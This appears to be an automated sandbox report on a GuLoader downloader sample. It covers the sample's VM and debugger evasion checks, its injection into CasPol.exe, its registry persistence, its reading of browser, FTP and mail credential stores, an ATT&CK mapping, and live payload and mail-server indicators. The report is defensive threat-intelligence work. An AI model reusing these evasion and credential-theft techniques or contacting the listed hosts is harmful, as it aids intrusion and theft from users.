          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Code function: 1_2_03252BAA push 00000008h; iretd
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Code function: 1_2_03256618 push ebx; retf
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Code function: 1_2_0325821B push edi; iretd
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Code function: 1_2_03254CAE push esi; retf
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Code function: 1_2_03253A84 push ds; iretd
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Code function: 1_2_03258A83 pushfd ; retn 0004h
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Code function: 1_2_03253C9D push ds; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 3_3_00EE02B3 pushad ; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 3_3_00EE2ACE push esp; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 3_2_0113A159 push ebx; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 3_2_01131051 push eax; ret
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Code function: 1_2_713D1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | File created: C:\Users\user\AppData\Local\Temp\ThrottlePlugin.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | File created: C:\Users\user\AppData\Local\Temp\nsn7515.tmp\System.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup key
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | File opened: C:\Program Files\qga\qga.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Program Files\qga\qga.exe
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821318181.0000000003341000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821318181.0000000003341000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2936 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ThrottlePlugin.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Code function: 1_2_03251B34 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Window / User API: threadDelayed 9943
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Code function: 1_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Code function: 1_2_0040290B FindFirstFileW,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Code function: 1_2_0040699E FindFirstFileW,FindClose,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | System information queried: ModuleInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | API call chain: ExitProcess graph end node
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821586909.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Guest Shutdown Service
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821586909.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Remote Desktop Virtualization Service
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821586909.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmicshutdown
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821586909.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Volume Shadow Copy Requestor
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821586909.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V PowerShell Direct Service
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821586909.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Time Synchronization Service
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821586909.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmicvss
          Source: CasPol.exe, 00000003.00000003.38236903342.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.42052633548.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.42052117582.0000000000E5B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
          Source: CasPol.exe, 00000003.00000003.38236903342.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.42052633548.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWG
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821318181.0000000003341000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dll
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821318181.0000000003341000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821586909.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Data Exchange Service
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821586909.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Heartbeat Service
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821586909.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Guest Service Interface
          Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821586909.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmicheartbeat
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Code function: 1_2_713D1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Code function: 1_2_03258525 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Code function: 1_2_0325EF5D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Code function: 1_2_0325D9AD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Code function: 1_2_0325DF99 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Code function: 1_2_03258BC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Code function: 1_2_03255004 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Code function: 1_2_03258C4F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Code function: 1_2_03258CB1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Code function: 1_2_03258C90 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Code function: 1_2_03258CE4 mov ebx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Code function: 1_2_03258CE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Code function: 1_2_03258AE0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Code function: 1_2_03258AEC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Code function: 1_2_03258CEC mov ebx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Process queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Process queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 3_2_011437F8 LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: B10000
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | Code function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information

Source: Yara match | File source: 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 8356, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: Yara match | File source: 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 8356, type: MEMORYSTR

          Remote Access Functionality

Source: Yara match | File source: 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 8356, type: MEMORYSTR
MITRE ATT&CK Matrix (techniques listed per tactic column; bracketed numbers are the counts shown next to a technique in the matrix)

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation [2 1 1]; Native API [1]; At (Linux); At (Windows); Cron; Launchd
Persistence: DLL Side-Loading [1]; Registry Run Keys / Startup Folder [1]; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Privilege Escalation: DLL Side-Loading [1]; Access Token Manipulation [1]; Process Injection [1 1 1]; Registry Run Keys / Startup Folder [1]; Network Logon Script; Rc.common
Defense Evasion: Disable or Modify Tools [1]; Obfuscated Files or Information [1]; DLL Side-Loading [1]; Virtualization/Sandbox Evasion [2 4 1]; Access Token Manipulation [1]; Process Injection [1 1 1]
Credential Access: OS Credential Dumping [2]; Credentials in Registry [1]; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: File and Directory Discovery [3]; System Information Discovery [1 1 7]; Security Software Discovery [3 3 1]; Process Discovery [1]; Virtualization/Sandbox Evasion [2 4 1]; Application Window Discovery [1]
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data [1]; Data from Local System [2]; Email Collection [1]; Clipboard Data [1]; Keylogging; GUI Input Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Command and Control: Ingress Tool Transfer [1]; Encrypted Channel [1]; Non-Standard Port [1]; Non-Application Layer Protocol [2]; Application Layer Protocol [1 2 2]; Multiband Communication
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features
Impact: System Shutdown/Reboot [1]; Device Lockout; Delete Device Data

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

Source | Detection | Scanner | Label
SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | 22% | Virustotal |
SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe | 7% | ReversingLabs | Win32.Downloader.GuLoader
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\ThrottlePlugin.dll | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\ThrottlePlugin.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\nsn7515.tmp\System.dll | 3% | Metadefender |
C:\Users\user\AppData\Local\Temp\nsn7515.tmp\System.dll | 0% | ReversingLabs |
          No Antivirus matches
          No Antivirus matches
Source | Detection | Scanner | Label
http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
http://DynDns.comDynDNS | 0% | Avira URL Cloud | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | Avira URL Cloud | safe
http://mail.paralikgroup.com | 0% | Avira URL Cloud | safe
http://artist151sh.com/paralikgroup%20ori%204_vJdEAWVzP17.bin | 0% | Avira URL Cloud | safe
http://ckatRU.com | 0% | Avira URL Cloud | safe
https://8tHZzAc0TjNm.org | 0% | Avira URL Cloud | safe
https://8tHZzAc0TjNm.orgt-Wl | 0% | Avira URL Cloud | safe
https://8tHZzAc0TjNm.orgx | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
artist151sh.com | 50.7.115.119 | true | true | | unknown
mail.paralikgroup.com | 173.254.28.216 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://artist151sh.com/paralikgroup%20ori%204_vJdEAWVzP17.bin | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://creativecommons.org/ns#DerivativeWorks | SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37816912349.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.dr | false | | high
http://127.0.0.1:HTTP/1.1 | CasPol.exe, 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://DynDns.comDynDNS | CasPol.exe, 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://creativecommons.org/licenses/by-sa/4.0/ | user-not-tracked-symbolic.svg.1.dr | false | | high
http://creativecommons.org/ns#Distribution | SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37816912349.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.dr | false | | high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | CasPol.exe, 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://mail.paralikgroup.com | CasPol.exe, 00000003.00000002.42078363194.000000001D233000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://creativecommons.org/ns#Attribution | SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37816912349.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.dr | false | | high
https://support.google.com/chrome/?p=plugin_flash | CasPol.exe, 00000003.00000002.42077625337.000000001D1AA000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://creativecommons.org/ns#ShareAlike | SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37816912349.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.dr | false | | high
http://ckatRU.com | CasPol.exe, 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://8tHZzAc0TjNm.org | CasPol.exe, 00000003.00000002.42078115092.000000001D20C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.42078363194.000000001D233000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nsis.sf.net/NSIS_ErrorError | SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, Toelike.exe.3.dr | false | | high
http://creativecommons.org/ns#Notice | SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37816912349.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.dr | false | | high
http://creativecommons.org/ns#Reproduction | SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37816912349.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, user-not-tracked-symbolic.svg.1.dr | false | | high
https://8tHZzAc0TjNm.orgt-Wl | CasPol.exe, 00000003.00000002.42078115092.000000001D20C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://8tHZzAc0TjNm.orgx | CasPol.exe, 00000003.00000002.42078115092.000000001D20C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
